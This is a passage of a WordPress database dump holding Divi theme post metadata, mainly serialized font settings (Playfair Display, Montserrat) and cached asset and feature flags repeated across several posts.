css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33375,950,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33371,1250,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33367,1382,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33368,1250,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33369,1250,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33370,1250,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33363,850,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33364,1382,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33365,1382,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33366,1382,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33359,1487,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33360,850,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33361,850,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33362,850,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33349,1021,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33350,1021,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33351,1021,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33352,901,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33353,901,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33354,901,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33355,901,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33356,1487,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33357,1487,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33358,1487,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33347,691,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33348,1021,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33339,1483,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33340,964,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33341,964,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33342,964,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33343,964,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33344,691,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33345,691,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33346,691,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33331,1197,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33332,1135,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33333,1135,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33334,1135,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33335,1135,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33336,1483,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33337,1483,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33338,1483,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33327,1359,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33328,1197,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33329,1197,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33330,1197,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33324,1359,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33325,1359,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33326,1359,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33322,1501,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33323,1501,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33317,1579,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33318,1579,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"anima